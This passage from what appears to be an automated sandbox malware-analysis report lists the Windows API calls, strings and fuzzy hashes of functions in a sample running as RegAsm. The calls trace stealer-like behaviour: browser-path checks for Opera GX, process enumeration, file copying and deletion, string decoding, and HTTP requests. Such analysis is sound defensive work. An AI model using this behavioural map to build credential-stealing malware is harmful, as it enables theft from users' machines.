                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ,00000000), ref: 0040FB64
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624), ref: 0040FB6B
                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ), ref: 0040FB89
                                                                                    • RegQueryValueExA.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000), ref: 0040FBA4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                    • String ID: CurrentBuildNumber
                                                                                    • API String ID: 3676486918-1022791448
                                                                                    • Opcode ID: 5b1574023f8c3e93d255d4511c3bb41a2e12e83297ccb6591afc91b84a13fdcf
                                                                                    • Instruction ID: 28640ec94ffd33d2c44419ba2cf0af880b9d8ee060d027bd97fbaf1b7c2936ad
                                                                                    • Opcode Fuzzy Hash: 5b1574023f8c3e93d255d4511c3bb41a2e12e83297ccb6591afc91b84a13fdcf
                                                                                    • Instruction Fuzzy Hash: C9F03076240214FBFB119BD1DC0BFAE7A7DEB45B04F101069F701A50A0D7B569409B28
                                                                                    Function 0040913E Relevance: 7.8, APIs: 5, Instructions: 274filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00409143
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425E0C,?,?,?,00425BF3,00000000), ref: 0040921D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004093E4
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004093F8
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040947A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                    • String ID:
                                                                                    • API String ID: 3423466546-0
                                                                                    • Opcode ID: bfef4180e8e3876148cd5ce538e57db1d27edee7cd8a81a86ac191b16032c8c9
                                                                                    • Instruction ID: 6a8509654029ecf25c00575de94dff416ad1a9dfa5c75539aeb624d08fba698f
                                                                                    • Opcode Fuzzy Hash: bfef4180e8e3876148cd5ce538e57db1d27edee7cd8a81a86ac191b16032c8c9
                                                                                    • Instruction Fuzzy Hash: 61B15A71904248EACB15EBE4D965BDDBBB4AF28308F54407EE406735C2DB782B0DDB26
                                                                                    Function 6C6DC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C6DC947
                                                                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C6DC969
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C6DC9A9
                                                                                    • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C6DC9C8
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C6DC9E2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocInfoSystem$Free
                                                                                    • String ID:
                                                                                    • API String ID: 4191843772-0
                                                                                    • Opcode ID: 7b10c12b150b65128b5bb758dbc7213c85ab402017290b37de05157168d9f821
                                                                                    • Instruction ID: 3106be2bbb62eecbeaa3708393ccff10b5b68346d1f23fae88d726054f81c405
                                                                                    • Opcode Fuzzy Hash: 7b10c12b150b65128b5bb758dbc7213c85ab402017290b37de05157168d9f821
                                                                                    • Instruction Fuzzy Hash: D421FF31741618BBD714BA24DC84BAE7379AB8670CF61412BF9079B680D7707C048799
                                                                                    Function 004102C3 Relevance: 7.6, APIs: 5, Instructions: 70processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004102C8
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410303
                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 00410314
                                                                                    • Process32Next.KERNEL32(?,00000128), ref: 0041037C
                                                                                    • CloseHandle.KERNEL32(?,?,00000000), ref: 00410389
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 599723951-0
                                                                                    • Opcode ID: 3c5e1a4b5d184adccb3d47287da369a41380e06edb1f68eabc3b509b63f4a4a1
                                                                                    • Instruction ID: 88ec815686b26defa928efc06cad103335915502f2ebb48a4a43328a16f3c0f2
                                                                                    • Opcode Fuzzy Hash: 3c5e1a4b5d184adccb3d47287da369a41380e06edb1f68eabc3b509b63f4a4a1
                                                                                    • Instruction Fuzzy Hash: 922109B1A00118ABCB10EFA5C955AEEFBB9AF98344F50407EE415F3291CB785A488B65
                                                                                    Function 004024D7 Relevance: 7.5, APIs: 5, Instructions: 39memorystringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 004024F0
                                                                                      • Part of subcall function 0040245C: memset.MSVCRT ref: 00402481
                                                                                      • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
                                                                                      • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1
                                                                                    • strcat.MSVCRT(?,00000000,?,?,00000000,00000104), ref: 00402505
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00402510
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00402517
                                                                                      • Part of subcall function 00402308: ??_U@YAPAXI@Z.MSVCRT ref: 0040238D
                                                                                    • memset.MSVCRT ref: 00402540
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: memset$BinaryCryptHeapString$AllocateProcessstrcat
                                                                                    • String ID:
                                                                                    • API String ID: 3248666761-0
                                                                                    • Opcode ID: a641902682074bfb60fea3bc3b21c2ff598bd00ccde1354f0615c18b64d23653
                                                                                    • Instruction ID: 5936fd312f401cb4099e43ed518250dd8d8a99da873d70e406837ce1c28814d2
                                                                                    • Opcode Fuzzy Hash: a641902682074bfb60fea3bc3b21c2ff598bd00ccde1354f0615c18b64d23653
                                                                                    • Instruction Fuzzy Hash: BCF044B6C0021CB7CB10BBA4DD49FCA777C9F14304F0000A6BA45F2081DAB497C4CBA4
                                                                                    Function 0040D6BB Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 454COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040D6C0
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera GX,00425C1E,00425C1B,?,?,?), ref: 0040D70A
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                      • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040A893: _EH_prolog.MSVCRT ref: 0040A898
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                    • String ID: #$Opera GX
                                                                                    • API String ID: 2625060131-1046280356
                                                                                    • Opcode ID: 8438e43411761002320f3f9de9011d9594c7e5a89b65446c504462b94cd75c98
                                                                                    • Instruction ID: 7bf8bd95af0ab130806eb85ed7196d5d1824f91eddb0a7e88fed5b384ee0e496
                                                                                    • Opcode Fuzzy Hash: 8438e43411761002320f3f9de9011d9594c7e5a89b65446c504462b94cd75c98
                                                                                    • Instruction Fuzzy Hash: 47027C7190424CEADF14EBE5D956BDEBBB8AF19308F10417EE405732C2DA781B0C8B66
                                                                                    Function 00413326 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041332B
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00413348
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041340C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrlen
                                                                                    • String ID: ERROR
                                                                                    • API String ID: 2133942097-2861137601
                                                                                    • Opcode ID: e21d3304088cc9bcdfe72a3d82c06255ec2a2465ab3062463e78c3a24b0dedec
                                                                                    • Instruction ID: 1c592bd34475586d8bf3bdcea4321633edf8985e3e402502d8e97464bbd79d58
                                                                                    • Opcode Fuzzy Hash: e21d3304088cc9bcdfe72a3d82c06255ec2a2465ab3062463e78c3a24b0dedec
                                                                                    • Instruction Fuzzy Hash: 8C3152B1D00148AFDB00EFA9D956BDD7FB4AB15304F10807EF505A7292DB399648CBA5
                                                                                    Function 0041303A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041303F
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                                                      • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                      • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                      • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                      • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                      • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                      • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                      • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041309D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                    • String ID: ERROR$ERROR
                                                                                    • API String ID: 1120091252-2579291623
                                                                                    • Opcode ID: 345aea7090713525bc43328569ab8dfd80e6ef4a38db32126cd76269f1d4eab7
                                                                                    • Instruction ID: 0083d2e72e9c4a3b74dda565e39e4a0bb24369a5d23a76fc935ba894ca840aa9
                                                                                    • Opcode Fuzzy Hash: 345aea7090713525bc43328569ab8dfd80e6ef4a38db32126cd76269f1d4eab7
                                                                                    • Instruction Fuzzy Hash: 17210EB0900189EADB14FFA5C556BDDBBF4AF18308F50417EE80563682DB785B0CCB66
                                                                                    Function 00411001 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OpenProcess.KERNEL32(00000410,00000000,2IA), ref: 00411019
                                                                                    • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411034
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041103B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                    • String ID: 2IA
                                                                                    • API String ID: 3183270410-4174278054
                                                                                    • Opcode ID: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
                                                                                    • Instruction ID: 8552e384592846dc61b773d54a0908cfb1ecd9fdbc452b9aa5e823a114c6ff4c
                                                                                    • Opcode Fuzzy Hash: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
                                                                                    • Instruction Fuzzy Hash: 85F03079905228BBEB60AB90DC49FDD3B78AB09715F000061BE85A61D0DBB4AAC4CBD4
                                                                                    Function 00414437 Relevance: 6.1, APIs: 4, Instructions: 76sleepsynchronizationthreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00413460: _EH_prolog.MSVCRT ref: 00413465
                                                                                    • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
                                                                                    • CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$CreateObjectSingleSleepThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 2678630583-0
                                                                                    • Opcode ID: 1cb46bc23d17f687b51e131ae5113430bc73b21f4a29ab7455bec2179b617caf
                                                                                    • Instruction ID: ec526774ace028d9da9643eeb35cca1a79bf063c44aba5694452f09cb0374c28
                                                                                    • Opcode Fuzzy Hash: 1cb46bc23d17f687b51e131ae5113430bc73b21f4a29ab7455bec2179b617caf
                                                                                    • Instruction Fuzzy Hash: 23310D75900148AFCB11DFA4C995ADEBBB8FF18304F50412EF906A7281DB789A88CB95
                                                                                    Function 00401000 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
